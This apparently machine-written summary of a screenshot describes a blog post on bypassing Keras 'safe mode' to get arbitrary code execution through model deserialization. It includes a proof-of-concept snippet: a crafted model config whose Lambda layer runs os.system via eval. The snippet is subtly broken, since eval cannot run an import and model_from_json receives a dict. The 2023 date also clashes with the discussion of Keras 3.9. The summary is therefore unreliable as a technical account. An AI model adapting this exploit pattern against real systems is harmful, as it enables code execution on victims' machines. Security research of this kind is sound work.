From this webpage screenshot, the following key information about the vulnerability can be extracted: - **Title**: Is TensorFlow Keras "Safe Mode" Really Safe? Bypassing Safe Mode for Arbitrary Code Execution - **Author**: Ryan Smith, published on September 18, 2023 - **Main Content**: - Describes a vulnerability in Keras’s deserialization mechanism that allows attackers to bypass the “safe mode” and execute arbitrary code. - Provides example exploit code demonstrating how to exploit the vulnerability in Keras versions before and after 3.9. - Highlights security issues in Keras’s deserialization mechanism and advises developers to be aware of associated risks. - **Key Code Snippet**: ```python # Exploitation before Keras version 3.9 import keras from keras.models import model_from_json malicious_model = { 'class_name': 'ExploitModel', 'config': { 'name': 'exploit_model', 'layers': [ { 'class_name': 'InputLayer', 'config': { 'batch_input_shape': [None, 1], 'dtype': 'float32', 'name': 'input_1' } }, { 'class_name': 'Lambda', 'config': { 'function': 'lambda x: eval("import os; os.system(\'echo PWNED\')")', 'output_shape': [1] } } ] } } model = model_from_json(malicious_model) ``` - **Summary**: - The vulnerability exists in Keras’s deserialization process, enabling attackers to execute arbitrary code by crafting malicious model configurations. - Developers are advised to implement additional security measures when handling untrusted model configurations to prevent such attacks.